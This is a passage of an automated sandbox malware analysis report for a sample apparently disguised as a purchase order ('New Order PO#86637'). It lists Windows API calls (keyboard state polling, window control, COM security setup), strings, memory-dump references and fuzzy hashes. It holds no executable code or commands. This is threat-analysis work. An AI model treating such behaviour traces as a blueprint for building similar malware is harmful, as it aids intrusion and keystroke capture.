                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                            • __swprintf.LIBCMT ref: 0045E7F7
                                                                            • _wprintf.LIBCMT ref: 0045E8B3
                                                                            • _wprintf.LIBCMT ref: 0045E8D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2295938435-2354261254
                                                                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                            • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 3038501623-2263619337
                                                                            • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                            • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                            • __swprintf.LIBCMT ref: 0045E5F6
                                                                            • _wprintf.LIBCMT ref: 0045E6A3
                                                                            • _wprintf.LIBCMT ref: 0045E6C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2295938435-8599901
                                                                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00443B67
                                                                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                            • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                            • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                            • IsWindow.USER32(00000000), ref: 00443C3A
                                                                            • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1834419854-3405671355
                                                                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                            • LoadStringW.USER32(00000000), ref: 00454040
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • _wprintf.LIBCMT ref: 00454074
                                                                            • __swprintf.LIBCMT ref: 004540A3
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 455036304-4153970271
                                                                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                            APIs
                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                            • _memmove.LIBCMT ref: 00467EB8
                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                            • _memmove.LIBCMT ref: 00467F6C
                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                            • String ID:
                                                                            • API String ID: 2170234536-0
                                                                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                            • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                            • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                            • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                            • GetKeyState.USER32(00000012), ref: 00453E26
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                            • DeleteObject.GDI32(?), ref: 0047151E
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                            • DeleteObject.GDI32(?), ref: 004715EA
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                            • String ID:
                                                                            • API String ID: 3218148540-0
                                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                            • String ID:
                                                                            • API String ID: 136442275-0
                                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                            APIs
                                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                            • _wcstok.LIBCMT ref: 004674FF
                                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                            • _wcstok.LIBCMT ref: 004675B2
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                            • _wcslen.LIBCMT ref: 00467793
                                                                            • _wcscpy.LIBCMT ref: 00467641
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • _wcslen.LIBCMT ref: 004677BD
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                            • String ID: X
                                                                            • API String ID: 3104067586-3081909835
                                                                            • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                            • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 440038798-2785691316
                                                                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
